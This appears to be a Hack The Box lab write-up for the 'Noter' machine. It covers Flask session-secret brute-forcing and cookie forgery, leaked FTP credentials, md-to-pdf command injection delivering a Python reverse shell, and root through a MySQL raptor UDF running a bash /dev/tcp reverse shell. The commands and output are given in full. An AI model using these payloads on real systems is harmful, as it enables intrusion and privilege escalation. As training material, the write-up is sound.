# Flask Unsign Brute Force

`python3 -m pip install flask-unsign`

`flask-unsign --wordlist /usr/share/wordlists/kaonashi.txt --unsign --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoidGVzdCJ9.YpkKlw.Q5uqF3G27E2Sj7OY-ugT2Mnv-HQ' --no-literal-eval`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Noter]
└─# flask-unsign --wordlist /usr/share/wordlists/kaonashi.txt --unsign --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoidGVzdCJ9.YpkKlw.Q5uqF3G27E2Sj7OY-ugT2Mnv-HQ' --no-literal-eval 
[*] Session decodes to: {'logged_in': True, 'username': 'test'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 7680 attempts
b'secret123'
```

# Enum users

Different response with valid user or not.

`Invalid login` when is true.
`Invalid credentials` when is false.

We use burpsuite to find users with this wordlist.

`/usr/share/wordlists/seclists/Usernames/cirt-default-usernames.txt`

We found `blue` user.

# Make Cookie

`flask-unsign --sign --cookie "{'logged_in': True, 'username': 'blue'}" --secret 'secret123'`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Noter]
└─# flask-unsign --sign --cookie "{'logged_in': True, 'username': 'blue'}" --secret 'secret123'
eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYmx1ZSJ9.YsSsUA.qXM9Xwl4fD3O_n2Erviw7f3YZ5I
```

# Modify cookie

```
Cookie: session=eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYmx1ZSJ9.YsSsUA.qXM9Xwl4fD3O_n2Erviw7f3YZ5I
```

# Read Notes

In the notes pages we can see next note.

`http://10.129.83.248:5000/note/1/`
```
    Hello, Thank you for choosing our premium service. Now you are capable of
doing many more things with our application. All the information you are going
to need are on the Email we sent you. By the way, now you can access our FTP
service as well. Your username is 'blue' and the password is 'blue@Noter!'.
Make sure to remember them and delete this.  
(Additional information are included in the attachments we sent along the
Email)  
  
We all hope you enjoy our service. Thanks!  
  
ftp_admin
```

# Access FTP

We can access to ftp with blue credentials.

`ftp 10.129.83.248`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Noter]
└─# ftp 10.129.83.248  
Connected to 10.129.83.248.
220 (vsFTPd 3.0.3)
Name (10.129.83.248:root): blue
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||10798|)
150 Here comes the directory listing.
drwxr-xr-x    2 1002     1002         4096 May 02 23:05 files
-rw-r--r--    1 1002     1002        12569 Dec 24  2021 policy.pdf
226 Directory send OK.
ftp> get policy.pdf
local: policy.pdf remote: policy.pdf
229 Entering Extended Passive Mode (|||22702|)
150 Opening BINARY mode data connection for policy.pdf (12569 bytes).
100% |****************************************************************************************************| 12569       36.10 MiB/s    00:00 ETA
226 Transfer complete.
12569 bytes received in 00:00 (82.50 KiB/s)
```

# Reading PDF

The pdf says next:

```
4. Default user-password generated by the application is in the format of "username@site_name!" (This applies to all your applications)
```

We have other user `ftp_admin` so the password will be `ftp_admin@Noter!`.

# Access FTP ftp_admin

`ftp 10.129.83.248`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Noter]
└─# ftp 10.129.83.248
Connected to 10.129.83.248.
220 (vsFTPd 3.0.3)
Name (10.129.83.248:root): ftp_admin
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||41173|)
150 Here comes the directory listing.
-rw-r--r--    1 1003     1003        25559 Nov 01  2021 app_backup_1635803546.zip
-rw-r--r--    1 1003     1003        26298 Dec 01  2021 app_backup_1638395546.zip
226 Directory send OK.
ftp> get app_backup_1635803546.zip
local: app_backup_1635803546.zip remote: app_backup_1635803546.zip
229 Entering Extended Passive Mode (|||21728|)
150 Opening BINARY mode data connection for app_backup_1635803546.zip (25559 bytes).
100% |****************************************************************************************************| 25559      165.10 KiB/s    00:00 ETA
226 Transfer complete.
25559 bytes received in 00:00 (83.35 KiB/s)
ftp> get app_backup_1638395546.zip
local: app_backup_1638395546.zip remote: app_backup_1638395546.zip
229 Entering Extended Passive Mode (|||52186|)
150 Opening BINARY mode data connection for app_backup_1638395546.zip (26298 bytes).
100% |****************************************************************************************************| 26298      171.57 KiB/s    00:00 ETA
226 Transfer complete.
26298 bytes received in 00:00 (86.05 KiB/s)
```

# md-to-pdf RCE

Export notes execute bash commands. Use `md-to-pdf.js` to conver md files to pdf files. So we can write md file with bash commands.

```python
@app.route('/export_note_remote', methods=['POST'])
@is_logged_in
def export_note_remote():
    if check_VIP(session['username']):
        try:
            url = request.form['url']

            status, error = parse_url(url)

            if (status is True) and (error is None):
                try:
                    r = pyrequest.get(url,allow_redirects=True)
                    rand_int = random.randint(1,10000)
                    command = f"node misc/md-to-pdf.js  $'{r.text.strip()}' {rand_int}"
                    subprocess.run(command, shell=True, executable="/bin/bash")
```

`cat shell.md`
```
';python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.6",1234));
os.dup2( s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")' # '
```

`http://10.129.83.248:5000/export_note`
```
POST /export_note_remote HTTP/1.1
Host: 10.129.83.248:5000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://10.129.83.248:5000
Connection: close
Referer: http://10.129.83.248:5000/export_note
Cookie: session=eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoiYmx1ZSJ9.YsSyXw.Su8mFjDI3k1xOlgVkxCgP_fB7sg
Upgrade-Insecure-Requests: 1

url=http%3A%2F%2F10.10.14.6%2Fshell.md
```

`nc -lvnp 1234`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Noter]
└─# nc -lvnp 1234         
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.129.83.248] 39790
$ id
id
uid=1001(svc) gid=1001(svc) groups=1001(svc)
$ 
```

# SSH Connection

`ssh-keygen -t ed25519`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Noter]
└─# ssh-keygen -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/root/.ssh/id_ed25519): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_ed25519
Your public key has been saved in /root/.ssh/id_ed25519.pub
The key fingerprint is:
SHA256:4Td9RkavLNmEWDs9eoV+k00ujtNbh4tnc2l/SWL64FU root@kali
The key's randomart image is:
+--[ED25519 256]--+
|            . .  |
|           o = o |
|        . . + B +|
|       . . . @ *o|
|        S o = XE+|
|         . . @.=.|
|           .=.* =|
|          ..oo+B+|
|           .o++o+|
+----[SHA256]-----+
```

```
svc@noter:~$ mkdir .ssh
mkdir .ssh
svc@noter:~$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAAg6iVn2DowkJ5k76jBNSXAj7Vhg+z0qrA3u7mXaNuH root@kali' > .ssh/authorized_keys
echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAAg6iVn2DowkJ5k76jBNSXAj7Vhg+z0qrA3u7mXaNuH root@kali' > .ssh/authorized_keys
svc@noter:~$
```

`ssh svc@10.129.83.248`
```
┌──(root㉿kali)-[~/htb/Box/Linux/Noter]
└─# ssh svc@10.129.83.248                   
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue 05 Jul 2022 10:08:40 PM UTC

  System load:           0.0
  Usage of /:            84.8% of 4.36GB
  Memory usage:          9%
  Swap usage:            0%
  Processes:             238
  Users logged in:       0
  IPv4 address for eth0: 10.129.83.248
  IPv6 address for eth0: dead:beef::250:56ff:fe96:e42f

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

157 updates can be applied immediately.
112 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

svc@noter:~$ cat user.txt 
e3fa069ec55b3d3d202ee27ea636177f
svc@noter:~$
```

# Priv Esc

In the app files we can see a database credentials.

```
# Config MySQL
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'Nildogg36'
app.config['MYSQL_DB'] = 'app'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
```

`mysql -u root -pNildogg36`
```
svc@noter:~$ mysql -u root -pNildogg36
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 432
Server version: 10.3.32-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]>
```

# Priv Esc MySQL UDF

```
svc@noter:~$ cd /tmp
svc@noter:/tmp$ nano raptor_udf2.c
svc@noter:/tmp$ gcc -g -c raptor_udf2.c
svc@noter:/tmp$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```

```
svc@noter:/tmp$ mysql -u root -pNildogg36
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 477
Server version: 10.3.32-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [mysql]> create table foo(line blob);
Query OK, 0 rows affected (0.012 sec)

MariaDB [mysql]> insert into foo values(load_file('/tmp/raptor_udf2.so'));
Query OK, 1 row affected (0.004 sec)

MariaDB [mysql]> show variables like '%plugin%';
+-----------------+---------------------------------------------+
| Variable_name   | Value                                       |
+-----------------+---------------------------------------------+
| plugin_dir      | /usr/lib/x86_64-linux-gnu/mariadb19/plugin/ |
| plugin_maturity | gamma                                       |
+-----------------+---------------------------------------------+
2 rows in set (0.001 sec)

MariaDB [mysql]> select * from foo into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so';
Query OK, 1 row affected (0.001 sec)

MariaDB [mysql]> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.001 sec)

MariaDB [mysql]> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.000 sec)

MariaDB [mysql]>
```

```
MariaDB [mysql]> select do_system('bash -c "bash -i >& /dev/tcp/10.10.14.6/1234 0>&1"');
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/Noter]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.129.83.248] 40134
bash: cannot set terminal process group (950): Inappropriate ioctl for device
bash: no job control in this shell
root@noter:/var/lib/mysql# id  
id
uid=0(root) gid=0(root) groups=0(root)
root@noter:/var/lib/mysql# cat /root/root.txt
cat /root/root.txt
8a6abe2283cf088c0aa2f09c8a0c8408
root@noter:/var/lib/mysql#
```

# References
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/flask \
https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880 \
https://book.hacktricks.xyz/network-services-pentesting/pentesting-mysql#privilege-escalation-via-library \
https://www.exploit-db.com/exploits/1518